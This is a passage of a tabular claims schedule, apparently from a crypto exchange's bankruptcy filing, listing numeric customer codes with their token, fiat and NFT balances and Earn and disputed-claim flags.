| 07353026 | | CUSDT[1], DOGE[1101.18936516], USD[0.00] | | |
| 07353027 | | USD[10.00] | | |
| 07353028 | | USD[10.00] | | |
| 07353029 | | CUSDT[1], DOGE[2], USD[0.01] | | |
| 07353030 | | BAT[.423], BTC[0.05065085], DOGE[30056.992], ETH[.00048903], ETHW[.00048903], LTC[.00930314], SUSHI[96.109], TRX[.962], USD[3.17], USDT[1.32470640] | | |
| 07353031 | | USD[0.01] | | |
| 07353033 | | BRZ[1], CUSDT[3], DOGE[200.30102603], GRT[1], TRX[5], USD[0.00] | | |
| 07353034 | | USD[10.00] | | |
| 07353035 | | CUSDT[3], DOGE[1527.63305505], TRX[1], USD[0.01] | | |
| 07353036 | | USD[100.00] | | |
| 07353037 | | BRZ[0], USD[1.00], USDT[0] | | |
| 07353038 | | BTC[0], USD[0.00] | | |
| 07353039 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07353040 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353041 | | BRZ[2], CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07353042 | | DOGE[2767.46588728], USD[0.00] | | |
| 07353043 | | CUSDT[1], DOGE[.00938984], USD[146.22] | | |
| 07353044 | | USD[10.00] | | |
| 07353045 | | USD[135.63] | | |
| 07353046 | | DOGE[1], USD[10.00] | | |
| 07353047 | | USD[10.00] | | |
| 07353048 | | USD[10.00] | | |
| 07353049 | | DOGE[1223.84152247], NFT (293100115066774679/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #40)[1], NFT (349606708280002944/Dagg  Art #23)[1], SHIB[6619.861481B2], TRX[5412.8392038], USD[0.00] | Yes | |
| 07353050 | | USD[10.00] | | |
| 07353051 | | BTC[.00361074], ETH[.00351045], LINK[21.71684992], USD[0.00] | Yes | |
| 07353052 | | DOGE[2], TRX[1], USD[10.00] | | |
| 07353053 | | USD[10.00] | | |
| 07353054 | | BRZ[2], CUSDT[5], TRX[3], USD[0.01] | | |
| 07353055 | | USD[10.00] | | |
| 07353056 | | USD[10.00] | | |
| 07353057 | | BRZ[1], DOGE[1.00003696], TRX[2], USD[0.00] | | |
| 07353058 | | BTC[ .00000113], CUSDT[1], GRT[4.26674434], MATIC[6.9963607], TRX[36.57845693], USD[0.62], USDT[0] | Yes | |
| 07353059 | | BAT[2], BRZ[1], CUSDT[3], DOGE[1.13766347], SOL[4.23462005], TRX[3], USD[195.25] | | |
| 07353060 | | NFT (402028456498866910/Entrance Voucher #3150)[1], NFT (563121385402838017/APEFUEL by Almond Breeze #631)[1], USD[0.04] | Yes | |
| 07353061 | | BAT[2.00015267], BRZ[2], CUSDT[9], DOGE[595.37717756], GRT[5], SHIB[27402407.86777117], TRX[1], USD[0.00], USDT[0] | | |
| 07353062 | | USD[30.00] | | |
| 07353063 | | USD[100.82] | Yes | |
| 07353064 | | CUSDT[4], USD[0.03] | | |
| 07353065 | | USD[10.00] | | |
| 07353066 | | BTC[.00017199], DOGE[75.74381571], USD[0.03] | Yes | |
| 07353067 | | LTC[.00129626], USD[10.00] | | |
| 07353068 | | CUSDT[4], TRX[3], USD[0.00], USDT[1] | | |
| 07353069 | | USD[10.00] | | |
| 07353070 | | CUSDT[7], DAI[.00028645], DOGE[0.35938733], USD[0.03] | | |
| 07353071 | | USD[10.00] | | |
| 07353072 | | USD[536.02] | | |
| 07353073 | | USD[0.00] | | |
| 07353075 | | USD[10.00] | | |
| 07353077 | | USD[10.00] | | |
| 07353078 | | USD[10.00] | | |
| 07353079 | | BTC[.0081519], DOGE[0], ETH[0], USD[0.01], USDT[0.00003238] | | |
| 07353080 | | CUSDT[2], DOGE[1], TRX[2], USD[0.01] | Yes | |
| 07353081 | | USD[0.03] | | |
| 07353082 | | CUSDT[1], DOGE.74670094], TRX[2], USD[0.01] | | |
| 07353083 | | BRZ[2], BTC[0], CUSDT[4], DOGE[0], GRT[1], TRX[5], USD[0.00] | | |
| 07353084 | | USD[0.00], USDT[0] | | |
| 07353085 | | USD[10.00] | | |
| 07353086 | | TRX[217.60176309], USD[0.00] | | |
| 07353087 | | DOGE[1], USD[0.01] | | |
| 07353088 | | BRZ[60.03096587], BTC[.00046783], CUSDT[1], DOGE[597.94324687], ETH[.04141467], ETHW[.04089925], GRT[9.97752306], LINK[.63616039], LTC[.1084997], MATIC[.00100408], NFT (311845664697218453/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #24)[1], NFT (330556378376151337/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #25)[1], NFT (386314390094726414/My Habitat #04)[1], NFT (530222565924545759/Generative art #10)[1], NFT (562225634732428188/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #31)[1], TRX[880.98609939], USD[0.00] | Yes | |
| 07353089 | | USD[1.73] | Yes | |
| 07353090 | | DOGE[.262], USD[0.01], USDT[9.19] | | |
| 07353091 | | CUSDT[1], USD[0.39] | | |
| 07353093 | | USD[10.00] | | |
| 07353094 | | USD[10.00] | | |
| 07353095 | | BAT[1], BRZ[1], CUSDT[4], ETH[1.00126780], ETHW[1.00126780], TRX[1], USD[0.00], USDT[2] | | |
| 07353096 | | CUSDT[2], DOGE[4875.09402629], ETH[.23807999], ETHW[.23807999], USD[11.42] | | |
| 07353097 | | USD[10.00] | | |
| 07353098 | | USD[0.01] | | |
| 07353099 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353100 | | DOGE[3384.71980986], TRX[2], USD[0.01] | Yes | |
| 07353101 | | USD[10.00] | | |
| 07353102 | | USD[10.00] | | |
| 07353103 | | BTC[.00000001], CUSDT[9], DOGE[1], MATIC[.00015414], USD[0.00] | Yes | |
| 07353104 | | BRZ[1], CUSDT[2], DOGE[2], SHIB[1539594.61698936], USD[0.78], USDT[1.08633798] | Yes | |
| 07353105 | | BTC[0], CUSDT[7], DOGE[2], ETH[.00000001], NFT (317339025608750398/DOTB #5272)[1], NFT (321432097418253362/2871)[1], NFT (370307120387714539/Oink 1919)[1], NFT (391208463749977937/Frog #6648)[1], NFT (437769554276245340/Golden bone pass)[1], NFT (547844125172401984/Frog #5640)[1], NFT (556014635982581412/Cyber Frogs Ramen)[1], SOL[0], TRX[1], USD[0.02], USDT[0.00034098] | Yes | |
| 07353106 | | USD[10.00] | | |
| 07353107 | | DOGE[20.27098002], USD[0.00] | | |
| 07353108 | | BTC[.00147725], CUSDT[1], DOGE[50769.29169168], TRX[4], USD[4.00], USDT[1] | | |
| 07353109 | | DOGE[.0003896], SHIB[789.46928034], USD[11.40] | | |
| 07353110 | | BAT[1], BRZ[3], CUSDT[11], GRT[1], SOL[1], SUSHI[1], TRX[4], USD[0.00], USDT[3] | | |
| 07353111 | | USD[10.00] | | |
| 07353112 | | ALGO[102634.65914839], BAT[3.03606302], BF_POINT[300], BRZ[2], BTC[5.09895688], DOGE[4], ETH[100.98106132], ETHW[100.95416846], GRT[5.00309587], LINK[2.0390879], MATIC[1.00104106], NFT (386849448489216724/Romeo #679)[1], NFT (408690432163280264/Humpty Dumpty #64)[1], NFT (565788685175733814/Good Boy #7213)[1], SOL[2590.17855901], SUSHI[1.02156482], TRX[4], UNI[1.02032395], USD[71507.08], USDT[3.06844787] | Yes | |
| 07353113 | | CUSDT[1], USD[0.07] | Yes | |
| 07353114 | | USD[0.01] | | |
| 07353115 | | USD[10.00] | | |
| 07353116 | | DOGE[3607.83542957], GRT[10.41493478], SHIB[2055939.95846941], USD[0.00] | | |
| 07353117 | | USD[36.57] | Yes | |
| 07353118 | | USD[10.00] | | |
| 07353119 | | USD[10.00] | | |
| 07353120 | | USD[10.00] | | |
| 07353121 | | USD[10.00] | | |
| 07353123 | | AVAX[6.32932609], BRZ[6.467332], CUSDT[17], DOGE[25557.58238723], ETH[.08929044], ETHW[.05120644], NFT (462574665813036905/Pug Love)[1], SHIB[42297041.57138535], SOL[3.80035361], TRX[8237.47205395], USD[7.66], USDT[3.26736365] | Yes | |
| 07353124 | | USD[10.00] | | |
| 07353125 | | USD[10.00] | | |
| 07353126 | | USD[10.00] | | |
| 07353128 | | USD[10.00] | | |
| 07353129 | | USD[10.00] | | |
| 07353130 | | USD[10.00] | | |
| 07353131 | | USD[10.00] | | |
| 07353132 | | USD[10.00] | | |
| 07353133 | | DOGE[1], ETH[.00003781], ETHW[.00003781], USD[0.45], USDT[1.05517589] | Yes | |
| 07353135 | | USD[10.00] | | |
| 07353137 | | USD[10.00] | | |
| 07353138 | | CUSDT[3], DOGE[386.69077562], TRX[3], USD[5.63] | | |
| 07353139 | | CUSDT[1], DOGE[185.69880385], GRT[5.63072726], USD[0.00] | | |
| 07353141 | | BRZ[2], CUSDT[3], TRX[2], USD[0.00], USDT[1] | | |
| 07353142 | | DOGE[4.3954628], USD[0.00], USDT[2] | | |
| 07353143 | | USD[10.00] | | |
| 07353144 | | USD[10.00] | | |
| 07353145 | | USD[10.00] | | |
| 07353146 | | USD[10.00] | | |
| 07353147 | | CUSDT[1], DOGE[851.60583199], TRX[1], USD[154.20] | | |
| 07353148 | | USD[10.00] | | |
| 07353149 | | USD[10.00] | | |
| 07353150 | | USD[0.16] | | |
| 07353152 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07353153 | | USD[0.01], USDT[0] | | |
| 07353155 | | USD[10.00] | | |
| 07353156 | | USD[10.00] | | |
| 07353157 | | USD[0.00] | | |
| 07353158 | | DOGE[.07306099], USD[0.00] | | |
| 07353159 | | USD[10.00] | | |
| 07353160 | | BRZ[1], CUSDT[8], DOGE[1], TRX[3], USD[0.00], USDT[2] | | |
| 07353161 | | BRZ[0], BTC[0.00051542], DOGE[0], NFT (320776266025922466/Barcelona Ticket Stub #2003)[1], NFT (434875433059439126/Saudi Arabia Ticket Stub #639)[1], SHIB[1], SOL[0.00000002], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07353163 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353164 | | CUSDT[1], DOGE[4.04540626], USD[0.00] | Yes | |
| 07353165 | | USD[10.00] | | |
| 07353166 | | BRZ[1], BTC[.00160386], CUSDT[8], DOGE[2], GRT[470.70463002], LINK[6.01166404], TRX[686.54229622], USD[0.00] | | |
| 07353167 | | CUSDT[4], DOGE[1440.36836165], USD[0.00] | | |
| 07353168 | | USD[10.00] | | |
| 07353169 | | DOGE[1], TRX[1], USD[420.37] | | |
| 07353170 | | BTC[.07362431], DOGE[38426.61868628], GRT[1], TRX[2], UNI[1], USD[18.00] | | |
| 07353171 | | CUSDT[4], DOGE[53.49264339], TRX[1], USD[0.00] | | |
| 07353172 | | DOGE[1], USD[0.00] | | |
| 07353173 | | TRX[4.39324459], USD[0.00] | | |
| 07353174 | | DOGE[.00001709], SHIB[13900143.4986045], USD[0.00], USDT[0] | | |
| 07353175 | | USD[10.00] | | |
| 07353177 | | USD[10.00] | | |
| 07353178 | | DAI[.00000001], ETH[.00000002], SHIB[10], SOL[0], USD[12.31], USDT[0] | Yes | |
| 07353179 | | CUSDT[4], DOGE[1119.38901487], SOL[1.24275086], USD[0.37] | | |
| 07353180 | | USD[0.00] | | |
| 07353181 | | CUSDT[1], DOGE[9.75710892], USD[0.01] | | |
| 07353182 | | DOGE[3], ETH[0], USD[0.01] | | |
| 07353183 | | DOGE[.12786884], USD[0.01], USDT[0.00000001] | Yes | |
| 07353184 | | CUSDT[3], DOGE[3.000548], ETH[.24953518], ETHW[.24934366], USD[0.00] | Yes | |
| 07353185 | | BRZ[20.0634366], CUSDT[1], GRT[3.308428], LINK[.02160234], PAXG[.0013808], SOL[.31056992], TRX[2], USD[0.01], USDT[.54725219] | | |
| 07353186 | | ETH[106.74730836], ETHW[101.39244587], SOL[0], USD[4637.52] | Yes | |
| 07353187 | | CUSDT[1], USD[0.00] | | |
| 07353188 | | USD[10.00] | | |
| 07353189 | | BRZ[3], CUSDT[4], DOGE[0.00004186], TRX[4], USD[141.27] | | |
| 07353190 | | CUSDT[1], ETH[.0059783], ETHW[.0059099], USD[0.00] | Yes | |
| 07353191 | | USD[10.00] | | |
| 07353192 | | CUSDT[6], DOGE[204.14090026], TRX[1], USD[82.77] | | |
| 07353193 | | USD[10.00] | | |
| 07353194 | | DOGE[1.63560679], USD[0.00] | Yes | |
| 07353195 | | USD[10.00] | | |
| 07353197 | | BRZ[0], BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07353198 | | USD[1.04] | | |
| 07353199 | | USD[10.00] | | |
| 07353200 | | ETH[.00289286], ETHW[.00289286], USD[0.00] | | |
| 07353201 | | USD[10.00] | | |
| 07353202 | | CUSDT[3], DOGE[1100.21805388], KSHIB[376.01363876], SHIB[321055.21403645], TRX[380.86925873], USD[0.00] | Yes | |
| 07353203 | | USD[10.00] | | |
| 07353204 | | BAT[1], CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07353206 | | LTC[0], USD[0.00], USDT[0.79923061] | Yes | |
| 07353207 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07353208 | | ETH[0], SOL[0], UNI[0.00000385], USD[0.00] | Yes | |
| 07353210 | | USD[10.00] | | |
| 07353211 | | USD[10.00] | | |
| 07353213 | | USD[10.00] | | |
| 07353214 | | USD[10.00] | | |
| 07353215 | | USD[10.00] | | |
| 07353216 | | CUSDT[1], DOGE[11954.55415885], GRT[1.00312819], SHIB[718284.06242621], USD[0.02] | Yes | |
| 07353217 | | BRZ[0.00000004], BTC[.00148578], CUSDT[1], DOGE[0], ETH[0], ETHW[0], GRT[18.38260718], SOL[0], TRX[2], USD[0.00] | | |
| 07353218 | | USD[10.00] | | |
| 07353219 | | BRZ[0], USD[0.01] | | |
| 07353220 | | USD[10.94] | Yes | |
| 07353221 | | USD[10.00] | | |
| 07353223 | | USD[10.00] | | |
| 07353224 | | CUSDT[1], DOGE[323.1568323], USD[0.00] | | |
| 07353225 | | USD[10.00] | | |
| 07353226 | | TRX[2], USD[0.01] | | |
| 07353227 | | CUSDT[7], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353228 | | USD[10.00] | | |
| 07353229 | | USD[10.00] | | |
| 07353230 | | USD[10.00] | | |
| 07353231 | | USD[10.00] | | |
| 07353232 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07353233 | | CUSDT[.00051432], DOGE[0], ETH[.00000001], ETHW[0], GRT[1], SHIB[0.00000001], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07353235 | | BRZ[1], CUSDT[5], TRX[2], USD[0.00] | | |
| 07353236 | | USD[10.00] | | |
| 07353239 | | USD[10.00] | | |
| 07353241 | | BAT[12.2300058], DOGE[1], USD[0.00] | | |
| 07353242 | | BRZ[1], CUSDT[9], DOGE[1.00000513], USD[0.00] | Yes | |
| 07353243 | | USD[10.00] | | |
| 07353244 | | USD[10.00] | | |
| 07353245 | | USD[10.00] | | |
| 07353246 | | DOGE[969.11685341], USD[0.00] | | |
| 07353248 | | USD[10.00] | | |
| 07353249 | | USD[0.01] | | |
| 07353250 | | TRX[1], USD[0.00] | | |
| 07353251 | | USD[10.00] | | |
| 07353253 | | USD[10.00] | | |
| 07353254 | | USD[10.00] | | |
| 07353255 | | USD[10.91] | Yes | |
| 07353256 | | USD[10.00] | | |
| 07353257 | | BRZ[3], BTC[0.00212061], CUSDT[14], DOGE[899.51435142], GRT[92.41425199], LINK[2.66556112], SHIB[655196.4493473], SOL[.165443], TRX[218.06922678], USD[0.01] | Yes | |
| 07353258 | | USD[265.59] | | |
| 07353259 | | USD[10.00] | | |
| 07353260 | | BRZ[3], CUSDT[3], ETH[.01061812], ETHW[.01048132], TRX[4], USD[0.00], USDT[1.10451453] | Yes | |
| 07353261 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07353262 | | BRZ[1], USD[0.00] | | |
| 07353263 | | DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07353264 | | USD[10.00] | | |
| 07353265 | | USD[10.00] | | |
| 07353266 | | BRZ[1], BTC[0.00209098], CUSDT[3], DOGE[23084.16386968], GRT[1.00313735], KSHIB[539.94061733], TRX[6163.46415585], USD[0.00], USDT[1.08654633] | Yes | |
| 07353267 | | BAT[65.76577204], DOGE[255.75785775], USD[10.00] | | |
| 07353268 | | CUSDT[6], TRX[2], USD[0.01] | | |
| 07353269 | | CUSDT[1], DOGE[1064.13319376], USD[0.18] | | |
| 07353270 | | USD[10.00] | | |
| 07353271 | | TRX[1], USD[0.01] | | |
| 07353272 | | CUSDT[2], DOGE[1], TRX[3], USD[0.00], USDT[1] | | |
| 07353273 | | BTC[0.00007190], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00] | | |
| 07353275 | | CUSDT[1], DOGE[2059.03348357], ETH[.01779667], ETHW[.01779667], TRX[1], USD[0.00] | | |
| 07353276 | | BAT[1], BRZ[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07353277 | | USD[10.00] | | |
| 07353278 | | DOGE[4860.110998], GRT[52.82540676], TRX[2], USD[23.43] | | |
| 07353280 | | USD[10.00] | | |
| 07353281 | | CUSDT[11], DOGE[2028.87962448], USD[0.00] | | |
| 07353284 | | USD[0.00] | | |
| 07353285 | | BAT[81.96922792], BCH[.00034965], BRZ[0], BTC[0], CUSDT[9], DOGE[0], ETH[0.05907506], ETHW[0.05834090], GRT[470.34903184], KSHIB[13.54437088], LINK[0], LTC[0], MATIC[103.76929168], SHIB[1078612.41414044], SOL[0.21945079], SUSHI[10.68627297], TRX[88.08024354], USD[0.00], USDT[0.00000002] | Yes | |
| 07353286 | | CUSDT[1], DOGE[1.00000745], SUSHI[.00196914], TRX[2], USD[0.00] | | |
| 07353287 | | USD[10.00] | | |
| 07353288 | | BRZ[1], CUSDT[1], DOGE[3], SHIB[5], TRX[1], USD[0.00] | Yes | |
| 07353289 | | USD[10.00] | | |
| 07353290 | | USD[10.00] | | |
| 07353291 | | USD[10.00] | | |
| 07353292 | | USD[10.00] | | |
| 07353293 | | CUSDT[2], USD[0.01] | | |
| 07353294 | | BAT[2], BCH[0], BRZ[4], CUSDT[1], DOGE[0], TRX[4], USD[0.00], USDT[0] | | |
| 07353295 | | BAT[1], BRZ[1], CUSDT[6], SHIB[1], TRX[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353296 | | USD[10.00] | | |
| 07353297 | | USD[10.00] | | |
| 07353298 | | TRX[1], USD[0.00] | | |
| 07353299 | | USD[10.00] | | |
| 07353300 | | DOGE[.01918165], USD[0.05] | Yes | |
| 07353301 | | USD[10.00] | | |
| 07353303 | | BTC[.00142257], ETH[.00731974], ETHW[.00722391], USD[0.00] | Yes | |
| 07353304 | | USD[10.00] | | |
| 07353305 | | USD[10.00] | | |
| 07353306 | Contingent, Disputed | USD[10.00] | | |
| 07353307 | | BAT[.00007712], BRZ[1], CUSDT[7], DOGE[10.73198041], SUSHI[.00003739], TRX[1], USD[0.00], USDT[0] | | |
| 07353308 | | DOGE[186.6584736], USD[0.00] | | |
| 07353310 | | DOGE[135.91554751], USD[0.00] | | |
| 07353311 | | USD[10.00] | | |
| 07353312 | | CUSDT[4], DOGE[1240.16894871], TRX[2], USD[0.00] | | |
| 07353313 | | USD[10.00] | | |
| 07353314 | | DOGE[1], USD[0.01] | | |
| 07353317 | | TRX[150.89914837], USD[0.00] | | |
| 07353318 | | USD[10.00] | | |
| 07353319 | | CUSDT[3], DOGE[1.85957476], GRT[14598283], TRX[2], USD[0.17], USDT[1.10517026] | Yes | |
| 07353320 | | BAT[1], BRZ[2], CUSDT[14], DOGE[2], ETH[.00000001], ETHW[0], SHIB[5], USD[1.28], USDT[0.00000001] | | |
| 07353321 | | LINK[1.00023382], USD[20971.91], USDT[1.07066506] | Yes | |
| 07353322 | | TRX[1], USD[0.67] | | |
| 07353323 | | USD[10.00] | | |
| 07353324 | | CUSDT[2], DOGE[7682.24253733], TRX[2], USD[0.00] | | |
| 07353325 | | USD[10.00] | | |
| 07353326 | | DOGE[203.03002001], USD[0.00] | | |
| 07353327 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07353329 | | CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07353331 | | USD[10.00] | | |
| 07353332 | | USD[10.00] | | |
| 07353333 | | BRZ[4], CUSDT[2], DOGE[1.00075357], TRX[2], USD[0.00], USDT[1.078775] | Yes | |
| 07353334 | | USD[10.00] | | |
| 07353335 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07353336 | | USD[10.00] | | |
| 07353337 | | DOGE[186.16285569], SHIB[1584189.47773792], USD[0.00] | Yes | |
| 07353338 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07353339 | | USD[10.00] | | |
| 07353340 | | USD[0.00] | | |
| 07353341 | | USD[53.96] | | |
| 07353344 | | USD[10.00] | | |
| 07353346 | | CUSDT[1], DOGE[4751.88871548], GRT[1], TRX[1], USD[0.00] | | |
| 07353348 | | SHIB[59694.18003913], USD[0.00] | | |
| 07353349 | | BTC[0], DOGE[0], SHIB[1], USD[0.01] | Yes | |
| 07353350 | | CUSDT[1], DOGE[62.68397446], USD[0.33] | | |
| 07353351 | | USD[10.00] | | |
| 07353352 | | USD[10.00] | | |
| 07353353 | | DOGE[137.74290617], USD[0.00] | | |
| 07353354 | | BAT[8.11279037], CUSDT[472.85591785], DOGE[1580.75549669], ETH[.00318872], ETHW[.00318872], SUSHI[.32410037], TRX[143.45362302], UNI[.31059912], USD[0.00] | | |
| 07353355 | | USD[0.01] | | |
| 07353356 | | BAT[.0069622], CUSDT[8], DOGE[5840.44944066], TRX[1.00004353], UNI[1.27024753], USD[3.42] | Yes | |
| 07353361 | | USD[10.00] | | |
| 07353363 | | USD[10.00] | | |
| 07353364 | | DOGE[1391.62199414], TRX[1], USD[60.00] | | |
| 07353365 | | USD[10.00] | | |
| 07353366 | | USD[10.00] | | |
| 07353367 | | USD[10.00] | | |
| 07353368 | | BTC[.37538326], SHIB[1], SOL[205.32654635], USD[2.15], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353369 | | DOGE[.00065425], USD[0.01] | | |
| 07353370 | | DOGE[20.71376914], TRX[1], USD[0.00] | | |
| 07353371 | | BTC[.00021343], DOGE[0], TRX[1], USD[0.00] | | |
| 07353372 | | CUSDT[2], DOGE[6545.97542786], KSHIB[3074.45632236], SHIB[3081474.17724639], USD[0.00], USDT[0] | | |
| 07353373 | | USD[10.00] | | |
| 07353374 | | BRZ[1], GRT[8.62408204], USD[0.00] | | |
| 07353375 | | USD[10.00] | | |
| 07353376 | | USD[10.00] | | |
| 07353377 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07353378 | | USD[0.00], USDT[0] | | |
| 07353379 | | CUSDT[1], USD[0.00] | Yes | |
| 07353380 | | USD[10.00] | | |
| 07353381 | | BAT[214.4900903], DOGE[538.59077257], ETH[.00002853], ETHW[.00002853], USD[10.77] | Yes | |
| 07353382 | | USD[10.00] | | |
| 07353383 | | CUSDT[11], DOGE[2], TRX[1], USD[0.00] | | |
| 07353384 | | CAD[0.00], DOGE[0], SHIB[72876.12004628], USD[0.00] | Yes | |
| 07353385 | | USD[10.00] | | |
| 07353386 | | USD[10.00] | | |
| 07353387 | | USD[10.00] | | |
| 07353388 | | USD[0.00] | | |
| 07353389 | | GRT[5.68510902], USD[0.00] | | |
| 07353390 | | DOGE[1003.9872453], USD[0.00] | | |
| 07353391 | | BRZ[1], CUSDT[2], DOGE[2], ETH[0.00000441], ETHW[0.48296114], USD[524.58] | Yes | |
| 07353392 | | BAT[2], BRZ[1], CUSDT[1], GRT[1], TRX[3], USD[0.00] | | |
| 07353393 | | USD[10.00] | | |
| 07353394 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], USD[0.05] | | |
| 07353395 | | USD[10.00] | | |
| 07353396 | | USD[10.00] | | |
| 07353397 | | DOGE[2.00002347], TRX[.00029154], USD[0.01] | Yes | |
| 07353398 | | USD[10.00] | | |
| 07353399 | | USD[10.00] | | |
| 07353400 | | USD[0.00] | | |
| 07353401 | | DOGE[140.85241061], USD[0.00] | | |
| 07353402 | | BRZ[1], CUSDT[6], DOGE[0], TRX[1], USD[0.01] | Yes | |
| 07353403 | | USD[10.00] | | |
| 07353404 | | BRZ[1], CUSDT[1], SHIB[17309984.91714995], TRX[1], USD[0.00], USDT[1] | | |
| 07353405 | | BRZ[1], ETH[1.88241149], ETHW[1.88241149], USD[10.00] | | |
| 07353407 | | USD[10.00] | | |
| 07353408 | | BRZ[1], USD[0.01] | | |
| 07353409 | | USD[10.00] | | |
| 07353410 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07353411 | | USD[10.00] | | |
| 07353412 | | CUSDT[3], DOGE[3428.72562803], NFT (39230117100146139 1/Red Panda #3510)[1], SOL[2.23210236], TRX[3], USD[0.00], YFI[.00029204] | Yes | |
| 07353413 | | USD[10.00] | | |
| 07353414 | | BAT[3.60893116], BRZ[7.39882088], CUSDT[60.61723362], DOGE[1.53933671], TRX[408.30454967], UNI[1], USD[0.39] | | |
| 07353415 | | USD[10.00] | | |
| 07353416 | | USD[0.00], USDT[0] | | |
| 07353417 | | CUSDT[.1124489], DOGE[6.83278745], TRX[12113.57804643], USD[0.42] | Yes | |
| 07353418 | | BTC[0], CUSDT[1], DOGE[1], ETH[0], GRT[0], LINK[0], TRX[1], USD[0.00] | | |
| 07353419 | | BRZ[1], ETH[.06425745], ETHW[.06346063], LINK[15.20920266], SHIB[2], USD[0.00], USDT[0.00000349] | Yes | |
| 07353420 | | USD[10.00] | | |
| 07353421 | | BRZ[2], CUSDT[1], DOGE[.08346042], TRX[3], USD[0.01] | | |
| 07353422 | | DOGE[0], ETH[0.00002641], ETHW[0.00002641], GRT[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07353423 | | DOGE[1], USD[0.06] | | |
| 07353424 | | USD[0.00] | | |
| 07353425 | | DOGE[0], USD[0.03] | | |
| 07353426 | | USD[0.30], USDT[0] | | |
| 07353427 | | BAT[7.70440722], BRZ[3], BTC[0.00013324], CUSDT[9], DOGE[0], ETH[0], GRT[1.00404471], TRX[10.1079756], USD[0.00], USDT[2.204233] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353428 | | CUSDT[1], DOGE[40.28468509], USD[0.49] | | |
| 07353429 | | DOGE[143.31346476], USD[0.00] | | |
| 07353430 | | BTC[0], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07353431 | | USD[10.00] | | |
| 07353432 | | USD[10.00] | | |
| 07353433 | | CUSDT[1], DOGE[.00849539], TRX[1], USD[0.00] | | |
| 07353434 | | BTC[.00016343], SHIB[1434024.18356826], TRX[2], USD[21.66] | Yes | |
| 07353435 | | BTC[0], DOGE[.7669], ETH[.005], LTC[0], PAXG[.00000001], SOL[0.03303812], USD[0.00], USDT[0] | | |
| 07353436 | | USD[10.00] | | |
| 07353437 | | USD[0.01] | | |
| 07353438 | | CUSDT[1], USD[0.00] | | |
| 07353439 | | CUSDT[2], DOGE[.2707474], ETH[.00364241], ETHW[.00364241], TRX[1], USD[162.24] | | |
| 07353440 | | CUSDT[1], USD[0.00] | | |
| 07353441 | | USD[10.00] | | |
| 07353442 | | USD[10.00] | | |
| 07353443 | | CUSDT[2], DOGE[73486.44031646], ETH[.52736019], ETHW[.52736019], GRT[1], USD[0.35] | | |
| 07353444 | | USD[0.01] | | |
| 07353445 | | TRX[220.79081086], USD[0.00] | | |
| 07353446 | | DOGE[.84623897], TRX[1], USD[0.01] | | |
| 07353447 | | TRX[74.73532655], USD[0.00] | | |
| 07353448 | | BRZ[1], BTC[.00088562], CUSDT[4], DOGE[434.19190425], ETH[.56181099], ETHW[.56156988], GRT[1.00498957], TRX[3.0042633], USD[50.97] | Yes | |
| 07353449 | | USD[10.00] | | |
| 07353450 | | BTC[.00000287], USD[0.00] | | |
| 07353451 | | USD[10.00] | | |
| 07353452 | | USD[10.00] | | |
| 07353453 | | USD[10.00] | | |
| 07353454 | | CUSDT[1], DOGE[510.64424494], TRX[2], USD[0.00] | Yes | |
| 07353455 | | USD[10.00] | | |
| 07353458 | | USD[10.00] | | |
| 07353459 | | USD[10.00] | | |
| 07353461 | | DOGE[424.41977633], TRX[1], USD[0.00] | | |
| 07353462 | | USD[10.00] | | |
| 07353463 | | USD[10.00] | | |
| 07353464 | | BF_POINT[300], CUSDT[1], DOGE[1], ETH[.00000032], ETHW[.00000032], TRX[1], USD[0.00] | Yes | |
| 07353465 | | BRZ[1], DOGE[1], TRX[2], USD[0.00] | | |
